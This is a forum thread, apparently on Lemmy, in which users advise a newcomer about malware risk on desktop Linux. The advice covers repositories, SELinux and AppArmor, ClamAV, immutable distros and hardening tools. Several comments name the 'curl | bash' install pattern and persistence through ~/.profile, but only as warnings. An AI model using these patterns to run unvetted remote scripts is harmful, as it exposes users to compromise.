I’m still in the research phase of switching to Linux and don’t know if this concern is reasonable. I’m not tech savvy. I’m comfortable in the windows ecosystem and could use the dos prompt fine when they used it. I played with QBasic and C++ when I was younger and have built a few computers but that was a couple decades+ ago.

My concern is dealing with malware. I know that Linux has less issues with malware than Windows but, as I understand it, that’s primarily because it has a comparatively small market share. I feel like I’m getting into Linux just as it’s getting more popular and that it will get worse if the EU moves away from Microsoft because they will most likely adopt some form of Linux as their new standard. More less tech savvy people like me moving to Linux makes it a juicier target for people who create and use malicious software. It’s not a reason to stay with Windows but is it a reasonable concern? Are there sufficient tools for people who don’t really know what they’re doing to be reasonably secure on Linux and will they keep up if the threat profile expands as Linux picks up more users?

  • pheusie@programming.dev
    1·
    1 day ago

    OP, I’ll keep it short as you might have already moved on. Security on desktop Linux isn’t great. The lack of widespread sandboxing is one of the main culprits. Good ‘hygiene’ should keep you safe. But, if you’re (rightfully) more concerned, then I’d suggest looking into secureblue[1].

    1. Note: this distro might be hard to get into if it’s your first distro. Consider joining community channels for assistance. ↩︎

      • pheusie@programming.dev
        1·
        15 hours ago

        Aight. I’ll give you some more then 😜:

        • Don’t expect real-time protection (à la Windows Defender) on Linux. While decent options do exist[1], the better ones come at a premium.
        • Though, related to the previous point, that’s not necessarily a bad thing. The epitome of secure OSes, GrapheneOS (for mobile) and Qubes OS (for desktop), don’t come pre-installed with one either. And I wouldn’t be surprised if their respective maintainers would justify it by stating that proactive security is simply better than reactive security.
        • FWIW, Lynis is a battle-tested security tool used to audit the system. It doesn’t work on Windows, but does on macOS, Linux and some other systems. It even goes as far as granting a numerical rating that represents how well the system performs on security and notes (point-by-point) what could be improved (and sometimes even how). While I would definitely not argue that it’s the be-all and end-all, the numeral rating definitely makes it easy to compare distros at a glance.

        There’s perhaps more to go through, but I believe we should address the elephant in the room:

        How much hardening did you even apply on your current/previous OS?

        Like, if you’ve built a literal fortress, chances are that you’ll have a hard time finding a suitable distro that provides similar protection OOTB. But, if you’re just your average Joe and you just ran with how it came OOTB and at least didn’t try to actively sabotage/compromise their system, then… chances are that a decent amount of mainstream distros will suit you fine. I kinda hinted at it in my previous comment, but a mainstream distro could be fine if you uphold best practices. So, in that scenario, the query shifts to:

        Are you willing to adopt best practices?

        If you’re unsure whether you’ll manage given your wants/needs out of the system, then that would (again) shift the question. This time we’d have to discuss the activities you engage in and ‘decide’ whether there are any distros out there that can handle those gracefully and responsibly.

        Etc. Etc.

        Warning: as you should be aware by now, and if you haven’t yet, see the security entry on the (excellent) ArchWiki and the (infamous[2]) Linux entry on Madaidan’s Insecurities, this can be a pretty ugly rabbit hole. I hope this doesn’t discourage you, though.

        Finally, consider giving answers to the bold and cursive questions 😉.

        1. Ironically, Microsoft Defender for Endpoint on Linux is one of the best out there. ↩︎

        2. Madaidan used to be a security researcher on Whonix. Whonix is one of Linux’ finest when it comes to privacy and security. Heck, it’s involved in the preferred way to engage on the Tor network. It’s even endorsed by Edward Snowden. So, by their efforts/contributions, Madaidan should have rightfully earned the required credentials and be regarded as somewhat of an authority on the subject matter. However, this article wasn’t well-received. From what I saw, the community was mostly dismissive. Disappointingly so. Which…, unfortunately shows that there’s a lot more circle jerking than what we’d all admit to. Anyhow…, FWIW, there was actually a slice of the community that did take it seriously. I’d characterize them as the security-conscious. Furthermore, note that Madaidan hasn’t updated it for a couple of years now. So some of the writings have clearly become outdated. So, to be clear, the situation isn’t as bleak as they described in their article. ↩︎

        • can_you_change_your_username@fedia.ioOP
          1·
          1 hour ago

          I’m closer to the average user than someone who has built a fortress. I use Firefox with ublock, ghostery, and privacy badger. I use the free tier of proton vpn. I run avast daily and malwarebytes weekly.

          I think that I should already be close to best practices but I’m not sure how changing OS will affect that. I’m not really worried about being targeted for anything. I don’t think that I really do much risky beyond the occasional torrent or downloading a patch for a game. I get games primarily from gog, don’t open strange emails or click strange links, and use a password manager to generate secure passwords. One of the things that I’m most unsure about is keeping everything updated. Microsoft manages keeping everything updated for the most part on Windows and the last time I needed to find a driver anywhere except from Microsoft it came on a 3.5" floppy.

          I use my computer primarily for single player gaming, discord, and fediverse sites. I need a spreadsheet and word processer, I use open office for that right now. I do financial and work related things on a different device.

  • mlg@lemmy.worldEnglish
    11·
    3 days ago

    There’s a lot of misinformation in this thread. Linux malware targeted at desktop users has actually become more apparent in recent years due to the growing number of users.

    That didn’t use to be the case because Linux was almost exclusively used for everything except end user desktops.

    What you need to understand is Linux is fundamentally more secure from the OS perspective. A good example is how there are no network listening services running like how Windows has SMB/NetBIOS which had the infamous eternal blue vulnerabilities.

    That means it is highly unlikely you will be targeted by system/service level malware that exploits known vulnerabilities, so long as you stay reasonably up to date with your package manager. Add on to the fact you probably won’t be running such software like Apache or NGINX anyways.

    but is it a reasonable concern?

    Yes, you should still stay vigilant as a user as current malware, even for windows, typically invovles some level of social engineering.

    The bonus for linux is that you should optimally never have to download executables from the browser. Anytime you do, make sure to pay close attention to what you are downloading and where from.

    Some key stuff for linux:

    1. Never do a curl | bash. Always download the script and peruse it to see what it actually does.

    2. Always prefer packages from package manager, and be careful if using 3rd party repos such as AUR or COPR

    3. Don’t download binaries from untrusted sources, and never run as sudo without knowing what it does.

    Are there sufficient tools for people who don’t really know what they’re doing to be reasonably secure on Linux and will they keep up if the threat profile expands as Linux picks up more users?

    Yes, I suggest you become a little bit familiar with a distro that has SELinux (ex: Fedora). It’s just a MAC security control scheme, but it adds a lot of benefit if you aren’t familiar with Linux in general.

    Aside from that, you can use ClamAV for virus scanning. AV and consumer EDR on Linux isn’t that widely available due to the low amount of malware at this time, but I do expect that to slowly change as the userbase grows.

    As malware detection gets better, I’m sure ClamAV will add features and functionality to keep up.

    • forestbeasts@pawb.social
      3·
      3 days ago

      Distros that don’t have SELinux generally have AppArmor, which is similar, and has the advantage that it doesn’t have quite such a boneheaded design getting in the way all the time. :3 So I wouldn’t pick a distro just to get SELinux, personally!

      (I don’t like how SELinux sticks labels on individual files, except those labels are apparently pointless, because there’s a tool specifically to go through your whole filesystem and reset all the labels if they get screwed up. Which can happen (e.g. if you mount a home directory that doesn’t have the labels of every single file in it set to “this is a home file”, because you moved it from a Debian install where that isn’t a thing).)

      – Frost

      • mlg@lemmy.worldEnglish
        2·
        10 hours ago

        I can’t find it now, but there was some talk about AppArmor being dropped due to its limiations, but I guess that’s no longer the case?

        But yeah the selinux “just relabel all” is an annoying duct tape solution to anyone who has issues. Optimally you should only need to relabel a dir/file once or set the appropriate selinux policy flag if you do run into a problem.

        The user friendly solution is supposed to be the troubleshooter, which actually works pretty well most of the time, but it still requires the user to know how SElinux works to use correctly.

  • ShellMonkey@piefed.socdojo.comEnglish
    421·
    4 days ago

    Linux already runs a huge portion of the world’s servers, which are a more lucrative target for bad actors than an individual machine, so it’s solidly battle tested.

    • zxqwas@lemmy.world
      32·
      4 days ago

      They also have reasonably tech savvy admins.

      The attack I see as a risk for someone with someone with “some skill” is copy pasting a command as root because someone on a forum said it would diagnose an issue they were having and installing a bitcoin miner on their computer.

      • skankhunt42@lemmy.ca
        9·
        4 days ago

        Running curl piped to bash with sudo has become pretty common. Just run this one line to install software or repos+keys that are later used to install software. That along with most older articles starting with turning off SELinux make me sad.

        I think the most important part is to take your time and understand what you’re doing before you do it. Tech savvy admins can also be caught if they’re in a rush or just blindly trust AI without confirming the command is safe.

        • forestbeasts@pawb.social
          5·
          4 days ago

          SELinux is also just a pain in the tail. We’re on Debian which has got AppArmor instead and while it has caused problems, it’s caused problems a heck of a lot less often than SELinux did when we tried Fedora.

          – Frost

      • tyrant@lemmy.worldEnglish
        5·
        4 days ago

        Unfortunately I could see myself doing something like that in a moment of frustration

  • sbird@sopuli.xyzEnglish
    16·
    4 days ago

    One of the main reasons why Linux can be more secure is that, being open-source, anybody is able to review the code and submit changes, meaning vulnerabilities and exploits are usually patched very quickly. This is one of the reasons why Linux has a larger market share when it comes to servers, since data security is pretty important for those!

  • Seefra 1@lemmy.zip
    10·
    4 days ago

    Yes, security concerns are always reasonable, specially when you’re switching to different software.

    Generally speaking most Gnu/Linux distributions are safer than your average windows install, mostly because on windows you download .exe files from developer’s website. Which exposes you to a higher probability of a man in the middle attack between your computer and the website or simply you clicking a fake clone of the website on the search engine.

    Installing software on windows is scary, I tend to double check the link from on the search engine, and then on wikipedia and check the wikipedia change history too to make sure the link on wikipedia wasn’t edited.

    Even if the link is legit it’s possible that the developer simply forgot to pay for the domain, someone snatched it and is now serving a malicious version. Or simply the server may be compromised.

    On Gnu/Linux on the other hand, usually software is installed via the repositories which are signed by the mantainer’s pgp key. That means that even if your server is compromised the package manager wont install the software if the signatures don’t match, if they do match, it’s still possible but very unlikely that the software was compromised somewhere in the supply chain, from the original developer to the maintainer, but as soon as detected the software is quickly removed and it’s usually on your distro’s security notices.

    Gnu/Linux is also generally more secure because when you update the system (and you should do it frequently), it updates also all installed applications (assuming you installed them via the repo). So while on windows you still have that same old version of a PDF reader or a video player since you first installed it that may have a known exploit (yes, I know chocolatey exists, but I’m talking about a standard install), on Gnu/Linux the applications are usually up-to-date.

    Of course a system is only as secure as the weakest link, if one application is insecure that may compromise the whole system, that’s where you should read hardening guides, you can sandbox applications with bubblewrap or firejail, for sandoxing applications, you can install linux-hardened if you have an arch-based distro, between other things that I never got my head around like SELinux or apparmor.

  • Agility0971@lemmy.world
    17·
    4 days ago

    Your concerns are valid.

    In my opinion the easiest solution, if you don’t know what youre doing (or dont wanna care) would be to use exclusively an immutable distro. That would lock you out of tweaking the system, but also heavily limit any potential malware. This should be sufficient imo:

    • keep system up to date
    • dont run programs or commands from unofficial channels
    • have firewall enabled and running
    • make offline backups of user files
    • use immutable distro
    • pheusie@programming.dev
      1·
      1 day ago

      The way you present “immutable distros” make them look like state-of-the-art stateless systems (a la NixOS with the impermanence module).

      As much as I’d wish (so-called) immutable distros were like that, almost none of them actually are[1].

      Fedora Atomic, which may or may not have surpassed NixOS in popularity by now, practically just locks down /usr. That’s cute, but it means that the immutability doesn’t prevent persistence of hardware in most of the filesystem.

      Similarly, I could go over the other popular immutables to point out how their immutability doesn’t do much to combat persistence. But I digress…

      1. It’s basically the aforementioned NixOS. And, even then, only if you’ve set it up like that. Guix System might offer it as well, but I couldn’t verify it the last time I looked into it. ↩︎

    • scarabic@lemmy.worldEnglish
      7·
      4 days ago

      This needs to be higher. It’s the first comment I came to that:

      1. recognized that security issues are always a concern and don’t just disappear with Linux
      2. recognized that low tech savvy was part of the question and
      3. gave a very practical and on-target suggestion for how to proceed (not just Team Linux rah-rah).
      • buttmasterflex@piefed.socialEnglish
        5·
        4 days ago

        Fedora Silverblue/Kinonite and Bazzite are the common ones I have heard about most as immutable options.

        I previously set up Kinonite on my wife’s laptop for her, as she doesn’t want to deal with any of the tech support stuff. By design, Kinonite is limited to installing programs as flatpaks without further tinkering/effort. It ultimately was a little too restrictive for what she wanted and had odd Bluetooth issues I was unable to sort out. I ended up putting the standard Fedora KDE spin on her laptop instead.

  • DoubleDongle@lemmy.world
    171·
    4 days ago

    Linux has a long history of being significantly more secure than Windows as well as being a much smaller target. Linux malware might exist these days, but it’s rare at most.

  • JTskulk@lemmy.worldEnglish
    8·
    4 days ago

    Malware is the least of your worries with Linux. The real reason malware has historically been more prevalent on Windows isn’t necessarily because of market share, it’s in the way software is distributed. In the Windows world, you go to random websites and install proprietary software; you have know idea if it’s trustworthy, even when you’ve found the official site. On Linux, you get your software from repositories (like the app store on your phone) where the software is open source and has been reviewed. All this software comes from trusted sources, you’re never accidentally going to get malware from your OS.

    • chicken@lemmy.dbzer0.com
      7·
      4 days ago

      On Linux, you get your software from repositories

      Unfortunately I have seen many software projects where the linux install instructions are to run a command that involves curl and a .sh file

      • JTskulk@lemmy.worldEnglish
        1·
        1 day ago

        That does happen, and those are bad. These people are bucking the trend and bringing the Windows mentality to Linux and I hate it.

  • Toes♀@ani.social
    10·
    4 days ago

    Most Linux malware comes from community repos and fake GitHub style projects.

    The default package repositories in all the major distributions are safe. Some examples to be worried about are pip packages and the AUR if you’re using Arch.

    My first programming language was qbasic as well. Fond memories of that.

    Vet third party sources, just like you would have on windows.

    • Cethin@lemmy.zipEnglish
      2·
      4 days ago

      Usually they’re safe. Safe enough that the average user doesn’t need to worry about it at least. Occasionally someone will take over as the maintainer of the package and add in malware. It’s pretty rare though and not a concern to the average user.

  • netvor@lemmy.world
    7·
    4 days ago

    Lot of people will tell you something like “don’t run stuff aS rOoT” but from personal security POV root is almost irrelevant. Potential attacker can do plenty of damage without root.

    root only allows crossing boundaries of the current user, but for personal use, everything you care about is probably 100% accessible under your normal user account. You don’t need root to steal your photos and passwords, you don’t need root to shimmy a daemon in your ~/.profile to start every time you log in, you don’t need root to mine shitcoins, use your machine as part of botnet or whatnot.

    Good advice is to vet everything you install, or choose a third party to vet it for you. In ideal world,

    • choose a stable, well-maintained and up-toodate distro with a good reputation,
    • limit installing software from official sources only. …and you’re probably going to be fine.

    In less than ideal world, maybe add flatpak to the mix but assume that the repository is a wild west. Running AppImage apps or installing third-party .deb/.rpm/etc. packages, again, if you trust the source, you trust the source.

    (But for f’s sake, don’t just run curl | bash scripts (with sudo or not) from random github repos and stuff.)

  • cannedtuna@lemmy.worldEnglish
    5·
    4 days ago

    Linux is very secure, or can be, but that depends on your threat model and how much you’re willing to do or put up with.

    The great thing about Linux is there tends to be a lot of solid documentation that explains what features are for and how to implement them. Links above are mostly to the Arch Wiki. Whatever distro you use, you’d want to start at their wiki. I’m currently using CachyOS, and I’ve found their wiki to be very helpful.

    Some other helpful features to look into are

    • btrfs snapshot support with GRUB or Limine bootloaders: easy snapshot rollback in case of a bad update
    • atomic distros like Bazzite: updates happen on a separate subvolume and don’t apply on reboot if they aren’t 100% successful
    • immutable distros like NixOS: core directories like /usr, /bin, /sbin, /lib, /lib64, /etc, /boot, /opt are read-only for higher security against malicious software
    • boeman@lemmy.world
      3·
      4 days ago

      Add to this periodic CIS benchmark with OpenSCAP to diagnose any openings and certain types of vulnerabilities as you add additional software or make configuration changes. Hardening your OS is a tough task, but even with windows or macOS, you can run into vulnerabilities that are completely there from bad configuration or rouge software.

      Now that I have that out of the way, it doesn’t matter what OS you run, there will be vulnerabilities. Being diligent in updating your machine (both the os and installed software) will do a lot of good to keep your workstation safer.

  • GlenRambo@jlai.luEnglish
    4·
    4 days ago

    If you read up on why android phones don’t need a virus scanner then basically the same applies to Linux.

    But you can always shoot yourself in the foot on any web connected device.

      • GlenRambo@jlai.luEnglish
        1·
        3 days ago

        I’ll take it you mean why can you shoot your foot on any web enabled device. As the other is longer tp explain (hence read up or watch a video).

        So a few easy ways to fuck up your device.

        • Username admin. Password 1234.
        • or not setting up any security
        • Install this free version of <popular game> from scam.com
        • use free shitty VPN
        • don’t ever update security
        • setup folder share on network with all or more of the above issues

        Pretty much applies to phones, PC, (and OS), consoles and other devices.

  • Azzu@lemmy.dbzer0.com
    5·
    4 days ago

    It’s simply not different than on Windows, arguably it’s much easier to stay secure. But if you managed it on Windows, the same applies on Linux: don’t run shit as administrator (root) and be suspicious if it wants to, backup your stuff, don’t install dodgy software.

  • scytale@piefed.zipEnglish
    2·
    4 days ago

    It is reasonable to be concerned, and you absolutely should be. Just because it’s a smaller target (at the moment), it doesn’t mean you’re completely safe. Having said that, if you apply general common sense to your habits, you will mostly be ok. You don’t have to be tech savvy to know that you shouldn’t be blindly installing software or running scripts you downloaded from the internet. You also don’t need to be tech savvy to be a safe internet user and have good security hygiene (i.e. avoid dubious websites, verify that sites are legit, only download from official sources, use an adblocker, responsible with passwords, etc.).

    Basic security measures like installing UFW on your computer and blocking incoming connections already help a ton. Then you can install clamAV if you still deal with Windows files and extensions.

  • k4ro@lemmy.zip
    2·
    4 days ago

    I think it’s reasonable to be concerend about Linux security. I do acknowledge that Windows just had more time to be tried and tested with malware and user error to have more safeguards, but I’m hopeful that Linux will get more secure while enduring less struggles than Windows as it gets popular.

    My general recommendation if you do decide to go with Linux is to keep your OS up to date, verify the apps you use (do you trust the devs, the distribution method, etc.) and use common sense (not every command you copy from the internet needs sudo, etc.).

    If you’re really curious on how you can make Linux more secure, check out the security-oriented distributions section at privacyguides.org.

    I’ve recently started using secureblue myself and it’s been a bit of an eye-opener on how secure you can make Linux and how much is still needed to be done.